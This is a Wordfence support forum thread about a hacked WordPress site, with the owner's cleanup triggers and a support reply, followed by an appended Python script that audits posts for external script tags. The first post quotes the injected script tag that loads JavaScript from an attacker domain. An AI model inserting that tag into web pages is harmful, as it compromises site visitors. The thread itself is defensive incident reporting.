Support » Plugin: Wordfence Security - Firewall & Malware Scan » Siteurl hacked to redirect to another site

  • Resolved ahall41

    (@ahall41)


    A similar issue was posted 11 months ago (now closed). Our site url was hacked to point at https://track.beforwardplay.com/track/zls.js?foup. Also every post had this script appended (several times):
    <script src='https://track.beforwardplay.com/track/pystats.js?l=l&' type=text/javascript language=javascript></script>

    I’ve cleaned this up via phpMyAdmin (and added some triggers to the tables to prevent it happening) – just wondering why WordFence hasn’t picked this up or prevented it …

    Thanks

Viewing 4 replies - 1 through 4 (of 4 total)
  • ahall41

    (@ahall41)

    I added the following triggers.

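    -- "/" is used as the statement delimiter here.
    -- Block changes to option_id 1 and 2 (typically siteurl and home on a default WordPress install).
    CREATE TRIGGER trg_update_wp_options BEFORE UPDATE ON wp_options
      FOR EACH ROW
        IF (NEW.option_id IN (1,2)) THEN
          SIGNAL SQLSTATE '45000' SET MESSAGE_TEXT = 'Cannot update locked record';
        END IF;
    /

    -- Reject any post update whose new content contains a <script ...> tag.
    CREATE TRIGGER trg_update_wp_posts BEFORE UPDATE ON wp_posts
      FOR EACH ROW
        IF (NEW.post_content LIKE '%<script%>%') THEN
          SIGNAL SQLSTATE '45000' SET MESSAGE_TEXT = 'Script not allowed in post';
        END IF;
    /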

    Just need to see if anything appears in error.log

    Not sure if this is significant, but I’ve detected a user wordpressssadmin (wordpressssadmin@test.com) role=None. Now removed.
    Also we’ve been having quite a few login attempts using real admin usernames. Even though I’ve changed them, the new names are appearing in the failed attempts list. “Prevent discovery of usernames through ‘/?author=N’ scans, the oEmbed API, and the WordPress REST API” is ticked, and the IDs don’t appear in any posts or pages that I can see. Which makes me suspect something is acting from the inside?

    Plugin Support WFGerroald

    (@wfgerald)

    Hey @ahall41,

    Wordfence protects against a vast variety of attacks. Whether you were hacked because of an unknown attack method or because there is some other issue in your system is hard to say. Some plugins contain vulnerabilities that are so bad that Wordfence can’t protect against them. The same goes for servers.

    It does sound like the site is compromised. I’d suggest updating all passwords including WordPress, sFTP, hosting control panel, and database.

    You can use the guide below to further comb the site. But if the issue or any other oddities return I’d suggest reaching out to a professional hack repair service to have the site cleaned and patched.

    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Thanks,

    Gerroald

    Thanks for the reply. I suspect we may have been hacked before we installed Wordfence … all the plugins we have now seem to be respectable. The spurious user has been removed – only 3 have access to create/update posts. All we can do is wait and see (except I think I should also add a trigger to prevent creating posts with <script> tags).
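
An added example, not part of the original thread and not Wordfence code: a Python audit that takes exported `post_content` values, finds script tags like the one quoted in the first post, and reports which hosts each post loads scripts from. The allowlisted host, the function names and the sample rows are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from (placeholder).
ALLOWED_HOSTS = {"www.example.org"}

class ScriptSrcCollector(HTMLParser):
    """Record the src of every <script> tag, whatever the attribute quoting."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":  # the parser lowercases tag and attribute names
            self.sources.append(dict(attrs).get("src") or "")

def external_script_hosts(post_content):
    """Return {host: count} for script tags not served from ALLOWED_HOSTS."""
    collector = ScriptSrcCollector()
    collector.feed(post_content)
    collector.close()
    hits = {}
    for src in collector.sources:
        # No src at all means an inline script; a relative src has no hostname.
        host = urlparse(src).hostname if src else "(inline)"
        if host and host not in ALLOWED_HOSTS:
            hits[host] = hits.get(host, 0) + 1
    return hits

def audit(rows):
    """rows: (post_id, post_content) pairs. Return {post_id: {host: count}}."""
    report = {}
    for post_id, content in rows:
        hits = external_script_hosts(content)
        if hits:
            report[post_id] = hits
    return report

# Constructed sample rows; the injected tag is the one quoted in the first post.
INJECTED = ("<script src='https://track.beforwardplay.com/track/pystats.js?l=l&' "
            "type=text/javascript language=javascript></script>")
SAMPLE_ROWS = [
    (101, "<p>Clean post</p>"),
    (102, "<p>Hello</p>" + INJECTED * 3),  # appended several times
    (103, '<p>Ok</p><SCRIPT SRC="https://www.example.org/app.js"></SCRIPT>'),
    (104, "<p>x</p><script>var a = 1;</script>"),
]

if __name__ == "__main__":
    print(audit(SAMPLE_ROWS))
```

Feeding it the rows from a database export shows which posts still carry injected tags after a cleanup and whether more than one host is involved.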
